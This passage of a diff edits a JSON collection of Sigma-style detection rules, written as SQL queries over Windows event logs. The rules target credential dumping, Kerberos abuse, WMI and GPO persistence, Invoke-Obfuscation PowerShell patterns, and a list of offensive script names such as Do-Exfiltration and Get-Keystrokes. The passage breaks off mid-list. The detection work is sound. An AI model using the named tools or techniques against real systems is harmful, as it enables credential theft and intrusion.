"SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Policies\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" ], - "filename": "file_event_win_susp_default_gpo_dir_write.yml" + "filename": "win_security_sam_registry_hive_handle_request.yml" }, { - "title": "Created Files by Microsoft Sync Center", - "id": "409f8a98-4496-4aaa-818a-c931c0a8b832", - "status": "experimental", - "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", - "author": "elhoim", + "title": "Processes Accessing the Microphone and Webcam", + "id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "status": "test", + "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" + "attack.collection", + "attack.t1123" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4663') AND (ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\microphone\\\\NonPackaged%' ESCAPE '\\' OR ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\webcam\\\\NonPackaged%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_creation_by_mobsync.yml" + "filename": "win_security_camera_microphone_access.yml" }, { - "title": "Writing Local Admin Share", - "id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", - "status": "experimental", - "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", - "author": "frack113", + "title": "Persistence and Execution at Scale via GPO Scheduled Task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "status": "test", + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "author": "Samir Bousseaden", "tags": [ + "attack.persistence", "attack.lateral_movement", - "attack.t1546.002" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\\\\\127.0.0%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" ], - "filename": "file_event_win_writing_local_admin_share.yml" + "filename": "win_security_gpo_scheduledtasks.yml" }, { - "title": "Suspicious Unattend.xml File Access", - "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "title": "WMI Persistence - Security", + "id": "f033f3f3-fd24-4995-97d8-a3bb17550a88", "status": "test", - "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", - "author": "frack113", + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "tags": [ - "attack.credential_access", - "attack.t1552.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Unknown (data set is too small; further testing needed)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\unattend.xml' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'WMI Namespace' AND ObjectName LIKE '%subscription%' ESCAPE '\\')" ], - "filename": "file_event_win_access_susp_unattend_xml.yml" + "filename": "win_security_wmi_persistence.yml" }, { - "title": "Suspicious Scheduled Task Write to System32 Tasks", - "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", - "status": "test", - "description": "Detects the creation of tasks from processes executed from suspicious locations", - "author": "Florian Roth (Nextron Systems)", + "title": "Addition of Domain Trusts", + "id": "0255a820-e564-4e40-af2b-6ac61160335c", + "status": "stable", + "description": "Addition of domains is seldom and should be verified for legitimacy.", + "author": "Thomas Patzke", "tags": [ "attack.persistence", - "attack.execution", - "attack.t1053" + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Legitimate extension of domain structure" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4706')" ], - "filename": "file_event_win_susp_task_write.yml" + "filename": "win_security_susp_add_domain_trust.yml" }, { - "title": "EVTX Created In Uncommon Location", - "id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "title": "DiagTrackEoP Default Login Username", + "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", "status": "experimental", - "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls", - "author": "D3F7A5105", + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Backup activity" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.evtx' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Containers\\\\BaseImages\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dllhost.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" ], - "filename": "file_event_win_create_evtx_non_common_locations.yml" + "filename": "win_security_diagtrack_eop_default_login_username.yml" }, { - "title": "Inveigh Execution Artefacts", - "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "title": "Win Susp Computer Name Containing Samtheadmin", + "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", "status": "experimental", - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "author": "elhoim", "tags": [ - "attack.command_and_control", - "attack.t1219" + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_inveigh_artefacts.yml" + "filename": "win_security_susp_computer_name.yml" }, { - "title": "Suspicious Double Extension Files", - "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "title": "Invoke-Obfuscation Via Use MSHTA - Security", + "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "status": "experimental", - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_double_extension.yml" + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" }, { - "title": "Suspicious Creation TXT File in User Desktop", - "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "title": "Register new Logon Process by Rubeus", + "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "status": "test", - "description": "Ransomware create txt file in the user Desktop", - "author": "frack113", + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.impact", - "attack.t1486" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" ], - "filename": "file_event_win_susp_desktop_txt.yml" + "filename": "win_security_register_new_logon_process_by_rubeus.yml" }, { - "title": "Startup Folder File Write", - "id": "2aa0a6b4-a865-495b-ab51-c28249537b75", - "status": "test", - "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", + "id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "status": "experimental", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%rundll32.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\')" + ], + "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml" + }, + { + "title": "ISO Image Mount", + "id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", + "status": "experimental", + "description": "Detects the mount of ISO images on an endpoint", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" + "Software installation ISO files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp%' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND ObjectServer = 'Security' AND ObjectType = 'File' AND ObjectName LIKE '\\\\Device\\\\CdRom%' ESCAPE '\\') AND NOT (ObjectName LIKE '\\\\Device\\\\CdRom0\\\\setup.exe' ESCAPE '\\'))" ], - "filename": "file_event_win_startup_folder_file_write.yml" + "filename": "win_security_iso_mount.yml" }, { - "title": "CVE-2022-24527 Microsoft Connected Cache LPE", - "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "title": "Invoke-Obfuscation Via Use Rundll32 - Security", + "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "status": "experimental", - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2022_24527_lpe.yml" + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" }, { - "title": "Creation Exe for Service with Unquoted Path", - "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "title": "Remote WMI ActiveScriptEventConsumers", + "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", - "author": "frack113", + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", "attack.persistence", - "attack.t1547.009" + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "SCCM" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" ], - "filename": "file_event_win_creation_unquoted_service_path.yml" + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" }, { - "title": "Adwind RAT / JRAT File Artifact", - "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", - "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1027" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "file_event_win_mal_adwind.yml" + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" }, { - "title": "QuarksPwDump Dump File", - "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "status": "test", - "description": "Detects a dump file written by QuarksPwDump password dumper", + "title": "Suspicious Kerberos RC4 Ticket Encryption", + "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "status": "experimental", + "description": "Detects service ticket requests using RC4 encryption type", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1558.003" ], "falsepositives": [ - "Unknown" + "Service accounts used on legacy systems (e.g. NetApp)", + "Windows Domains with DFL 2003 and legacy systems" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4769' AND TicketOptions = '0x40810000' AND TicketEncryptionType = '0x17') AND NOT (ServiceName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_quarkspw_filedump.yml" + "filename": "win_security_susp_rc4_kerberos.yml" }, { - "title": "APT29 2018 Phishing Campaign File Indicators", - "id": "3a3f81ca-652c-482b-adeb-b1c804727f74", + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "@41thexplorer", + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "author": "Thomas Patzke", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unlikely" + "Initial installation of a domain controller" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%ds7002.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.pdf%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.zip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" ], - "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml" + "filename": "win_security_susp_dsrm_password_change.yml" }, { - "title": "Malicious PowerShell Scripts - FileCreation", - "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "title": "Denied Access To Remote Desktop", + "id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", "status": "test", - "description": "Detects the creation of known offensive powershell scripts used for exploitation", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", + "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", + "author": "Pushkarev Dmitry", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Valid user was not added to RDP group" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR 